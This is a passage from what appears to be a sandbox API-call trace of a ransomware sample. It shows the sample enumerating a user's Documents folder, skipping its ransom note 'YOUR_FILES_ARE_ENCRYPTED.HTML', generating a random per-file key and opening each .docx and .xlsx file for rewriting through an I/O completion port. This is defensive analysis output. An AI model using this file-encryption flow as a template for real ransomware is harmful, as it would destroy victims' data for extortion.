dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="GY7EJdy5HHWlGnd.docx", cAlternateFileName="GY7EJD~1.DOC")) returned 1 [0124.357] StrStrIW (lpFirst="GY7EJdy5HHWlGnd.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.357] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx") returned 56 [0124.357] PathFindExtensionW (pszPath="GY7EJdy5HHWlGnd.docx") returned=".docx" [0124.357] lstrlenW (lpString=".docx") returned 5 [0124.357] PathFindExtensionW (pszPath="GY7EJdy5HHWlGnd.docx") returned=".docx" [0124.357] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gy7ejdy5hhwlgnd.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.358] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=46727) returned 1 [0124.358] GetProcessHeap () returned 0x600000 [0124.358] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.360] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="05") returned 2 [0124.360] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="5D") returned 2 [0124.360] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="A8") returned 2 [0124.360] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="1A") returned 2 [0124.360] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="EB") returned 2 [0124.360] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="DB") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="D0") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="50") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="AD") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="FB") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="9A") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="15") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="2B") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="28") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="D1") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="2D") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9B") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="12") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="0E") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="BE") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="23") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="E3") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C4") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="AE") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="AE") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="A8") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="2A") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="3E") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="71") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="D3") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="BF") returned 2 [0124.361] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="04") returned 2 [0124.362] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\GY7EJdy5HHWlGnd.docx" [0124.362] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.362] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.365] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c836210, ftCreationTime.dwHighDateTime=0x1d6b131, ftLastAccessTime.dwLowDateTime=0x4a4cf550, ftLastAccessTime.dwHighDateTime=0x1d6df7a, ftLastWriteTime.dwLowDateTime=0x4a4cf550, ftLastWriteTime.dwHighDateTime=0x1d6df7a, nFileSizeHigh=0x0, nFileSizeLow=0xfb0a, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="ibxevBOlAasZ.xlsx", cAlternateFileName="IBXEVB~1.XLS")) returned 1 [0124.365] StrStrIW (lpFirst="ibxevBOlAasZ.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.365] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx") returned 53 [0124.365] PathFindExtensionW (pszPath="ibxevBOlAasZ.xlsx") returned=".xlsx" [0124.365] lstrlenW (lpString=".xlsx") returned 5 [0124.365] PathFindExtensionW (pszPath="ibxevBOlAasZ.xlsx") returned=".xlsx" [0124.365] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ibxevbolaasz.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.366] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=64266) returned 1 [0124.366] GetProcessHeap () returned 0x600000 [0124.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.367] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="E9") returned 2 [0124.367] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="30") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="BB") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="7A") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="6E") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="82") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="41") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="9A") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="64") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="04") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="F3") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="84") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="B4") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="30") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="2B") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D4") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E0") returned 2 [0124.367] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B0") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F1") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="C9") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="CD") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="0E") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B1") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="35") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="CE") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="DC") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="EA") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="AC") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="39") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="3E") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="47") returned 2 [0124.368] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="32") returned 2 [0124.368] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\ibxevBOlAasZ.xlsx" [0124.368] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.368] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.372] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dc9d570, ftCreationTime.dwHighDateTime=0x1d6b2ea, ftLastAccessTime.dwLowDateTime=0xd0d99120, ftLastAccessTime.dwHighDateTime=0x1d6c2ef, ftLastWriteTime.dwLowDateTime=0xd0d99120, ftLastWriteTime.dwHighDateTime=0x1d6c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x15d0f, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="iWa1kf8wAaZIPCZeO.xlsx", cAlternateFileName="IWA1KF~1.XLS")) returned 1 [0124.372] StrStrIW (lpFirst="iWa1kf8wAaZIPCZeO.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.372] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx") returned 58 [0124.372] PathFindExtensionW (pszPath="iWa1kf8wAaZIPCZeO.xlsx") returned=".xlsx" [0124.372] lstrlenW (lpString=".xlsx") returned 5 [0124.372] PathFindExtensionW (pszPath="iWa1kf8wAaZIPCZeO.xlsx") returned=".xlsx" [0124.372] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\iwa1kf8waazipczeo.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.372] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=89359) returned 1 [0124.372] GetProcessHeap () returned 0x600000 [0124.372] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.373] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="29") returned 2 [0124.373] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="6C") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="96") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="CF") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="BF") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="D7") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="EE") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="DF") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C9") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="5F") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="C1") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="AD") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="5E") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="E9") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="5D") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="A0") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="18") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="EE") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="BC") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="F8") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="B6") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="38") returned 2 [0124.373] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C1") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="30") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="CF") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="71") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F3") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="A5") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="89") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="B7") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="33") returned 2 [0124.374] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="30") returned 2 [0124.374] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\iWa1kf8wAaZIPCZeO.xlsx" [0124.374] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.374] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.378] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c1cfa0, ftCreationTime.dwHighDateTime=0x1d6fae3, ftLastAccessTime.dwLowDateTime=0x17b6acd0, ftLastAccessTime.dwHighDateTime=0x1d70261, ftLastWriteTime.dwLowDateTime=0x17b6acd0, ftLastWriteTime.dwHighDateTime=0x1d70261, nFileSizeHigh=0x0, nFileSizeLow=0x8670, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="J2I7Gvg92W.docx", cAlternateFileName="J2I7GV~1.DOC")) returned 1 [0124.378] StrStrIW (lpFirst="J2I7Gvg92W.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.378] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx") returned 51 [0124.378] PathFindExtensionW (pszPath="J2I7Gvg92W.docx") returned=".docx" [0124.378] lstrlenW (lpString=".docx") returned 5 [0124.378] PathFindExtensionW (pszPath="J2I7Gvg92W.docx") returned=".docx" [0124.378] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\j2i7gvg92w.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.378] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=34416) returned 1 [0124.378] GetProcessHeap () returned 0x600000 [0124.378] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.379] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="F4") returned 2 [0124.379] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="8E") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="2D") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="2F") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="0B") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="A0") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="A6") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="3A") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="D0") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="2F") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="C9") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="72") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F5") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="3A") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="68") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="1E") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F7") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="A3") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F2") returned 2 [0124.379] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="08") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="A2") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="F8") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="CB") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="FF") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="B1") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="D7") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="D7") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="93") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="08") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="00") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="AC") returned 2 [0124.380] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="34") returned 2 [0124.380] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\J2I7Gvg92W.docx" [0124.380] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.380] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.386] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe0c38c0, ftCreationTime.dwHighDateTime=0x1d6dff2, ftLastAccessTime.dwLowDateTime=0xe50a1390, ftLastAccessTime.dwHighDateTime=0x1d6feef, ftLastWriteTime.dwLowDateTime=0xe50a1390, ftLastWriteTime.dwHighDateTime=0x1d6feef, nFileSizeHigh=0x0, nFileSizeLow=0x10c05, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="JD6g41iiZ3mVewQIJjeA.docx", cAlternateFileName="JD6G41~1.DOC")) returned 1 [0124.386] StrStrIW (lpFirst="JD6g41iiZ3mVewQIJjeA.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.386] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx") returned 61 [0124.386] PathFindExtensionW (pszPath="JD6g41iiZ3mVewQIJjeA.docx") returned=".docx" [0124.386] lstrlenW (lpString=".docx") returned 5 [0124.386] PathFindExtensionW (pszPath="JD6g41iiZ3mVewQIJjeA.docx") returned=".docx" [0124.386] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jd6g41iiz3mvewqijjea.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0124.386] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=68613) returned 1 [0124.386] GetProcessHeap () returned 0x600000 [0124.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.387] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="21") returned 2 [0124.387] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="FA") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DB") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="71") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="7F") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="0A") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="7E") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="60") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="F0") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="8F") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="56") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="54") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="89") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="A4") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CB") returned 2 [0124.387] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="9C") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="BF") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="5D") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="53") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="D0") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="8F") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="DB") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="8B") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B6") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="8F") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="E1") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="8B") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="CF") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="1E") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="09") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="D2") returned 2 [0124.388] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="29") returned 2 [0124.388] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\JD6g41iiZ3mVewQIJjeA.docx" [0124.388] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.388] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.392] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: 